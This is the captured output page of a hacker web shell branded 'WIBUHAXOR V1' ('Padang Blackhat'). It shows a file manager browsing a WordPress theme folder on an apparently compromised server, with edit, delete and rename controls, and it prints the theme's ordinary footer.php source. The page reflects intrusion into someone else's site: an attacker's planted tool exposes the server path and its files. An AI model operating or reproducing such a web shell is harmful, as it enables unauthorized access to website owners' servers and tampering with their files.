-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
bosa-fitness
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
inc
--
NONE
template-parts
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
archive.php
6.026KB
Edit File
Delete File
Rename
footer.php
3.147KB
Edit File
Delete File
Rename
<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Bosa Fitness 1.0.0 */ ?> <?php $footer_layout = ''; if( get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_one'){ $footer_layout = 'site-footer-primary'; }elseif( get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_two'){ $footer_layout = 'site-footer-two'; }elseif( get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_three'){ $footer_layout = 'site-footer-three'; } $has_footer_bg = ''; $footer_image = wp_get_attachment_url( get_theme_mod( 'footer_image', '' ) ); if ( $footer_image || get_theme_mod( 'top_footer_background_color', '' ) ){ $has_footer_bg = 'has-footer-bg'; } ?> <footer id="colophon" class="site-footer <?php echo esc_attr( $footer_layout . ' ' . $has_footer_bg ) ?>"> <div class="site-footer-inner" style="background-image: url(<?php echo esc_url( $footer_image ) ?>"> <?php if( !get_theme_mod( 'disable_footer_widget', false ) ): if( bosa_is_active_footer_sidebar() ): ?> <div class="top-footer"> <div class="wrap-footer-sidebar"> <div class="container"> <div class="footer-widget-wrap"> <div class="row"> <?php if( get_theme_mod( 'footer_widget_layout', 'footer_widget_layout_one' ) == '' || get_theme_mod( 'footer_widget_layout', 'footer_widget_layout_one' ) == 'footer_widget_layout_one' ){ get_template_part( 'template-parts/footer/footer-widget', 'one' ); }elseif( get_theme_mod( 'footer_widget_layout', 'footer_widget_layout_one' ) == 'footer_widget_layout_two' ){ get_template_part( 'template-parts/footer/footer-widget', 'two' ); }elseif( get_theme_mod( 'footer_widget_layout', 'footer_widget_layout_one' ) == 'footer_widget_layout_three' ){ get_template_part( 'template-parts/footer/footer-widget', 'three' ); }elseif( get_theme_mod( 'footer_widget_layout', 'footer_widget_layout_one' ) == 'footer_widget_layout_four' ){ get_template_part( 'template-parts/footer/footer-widget', 'four' ); } ?> </div> </div> </div> </div> </div> <?php endif; endif; ?> <?php if( !get_theme_mod( 'disable_bottom_footer', false ) ) { ?> <?php if( get_theme_mod( 'footer_layout', 'footer_three' ) == '' || get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_one' ){ get_template_part( 'template-parts/footer/footer', 'one' ); }elseif( get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_two' ){ get_template_part( 'template-parts/footer/footer', 'two' ); }elseif( get_theme_mod( 'footer_layout', 'footer_three' ) == 'footer_three' ){ get_template_part( 'template-parts/footer/footer', 'three' ); } } ?> </div> </footer><!-- #colophon --> </div><!-- #page --> <?php wp_footer(); ?> <div id="back-to-top"> <a href="javascript:void(0)"><i class="fa fa-angle-up"></i></a> </div> <!-- #back-to-top --> </body> </html>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat